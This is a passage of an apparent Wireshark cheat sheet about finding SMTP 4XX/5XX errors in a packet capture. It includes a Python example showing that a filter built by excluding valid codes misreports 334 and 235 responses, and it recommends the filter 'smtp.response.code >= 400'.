When you execute this filter you will end up only with 4XX and/or 5XX error codes, so you will see all SMTP errors within your capture. If it ends up blank, it means that no SMTP errors were found in that specific capture.

===========================================================================================================================
--------------------------------------------------------------------------------
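The exclusion-style SMTP error filter above works only if every valid code that appears in the capture is on the exclusion list. The following Python is an added example (not from the original cheat sheet) that applies the same exclusion logic to constructed SMTP response lines and compares it with a plain "code >= 400" test, showing which valid codes (such as 334 AUTH challenges or 235 auth success) the exclusion filter would report as errors.

```python
import re

# Constructed SMTP server responses as they might appear in a capture
# (sample data made up for this example, not taken from the page).
SAMPLE_RESPONSES = [
    "220 mail.example.test ESMTP ready",
    "250 OK",
    "334 VXNlcm5hbWU6",  # AUTH challenge: valid, but not on the exclusion list
    "235 2.7.0 Authentication successful",
    "250 2.1.0 Sender OK",
    "550 5.1.1 Recipient address rejected: User unknown",
    "354 End data with <CR><LF>.<CR><LF>",
    "421 4.7.0 Too many connections, try again later",
    "221 2.0.0 Bye",
]

# The valid codes the page's display filter excludes one by one.
PAGE_EXCLUDED_CODES = {220, 221, 250, 354}

_CODE_RE = re.compile(r"^(\d{3})\b")


def parse_codes(lines):
    """Extract the three-digit status code from each SMTP response line."""
    codes = []
    for line in lines:
        m = _CODE_RE.match(line)
        if m:
            codes.append(int(m.group(1)))
    return codes


def errors_by_exclusion(codes):
    """Mimic the page's filter: keep every code that is not 220/221/250/354."""
    return [c for c in codes if c not in PAGE_EXCLUDED_CODES]


def errors_by_class(codes):
    """Keep only 4XX/5XX codes, the same as the display filter 'smtp.response.code >= 400'."""
    return [c for c in codes if c >= 400]


def false_positives(lines):
    """Valid codes that the exclusion filter would wrongly report as errors."""
    codes = parse_codes(lines)
    return sorted(set(errors_by_exclusion(codes)) - set(errors_by_class(codes)))


if __name__ == "__main__":
    codes = parse_codes(SAMPLE_RESPONSES)
    print("exclusion filter:", errors_by_exclusion(codes))
    print(">= 400 filter:   ", errors_by_class(codes))
    print("false positives: ", false_positives(SAMPLE_RESPONSES))
```

In Wireshark the same class-based check can be written directly as `smtp.response.code >= 400`, which avoids having to enumerate every valid code by hand.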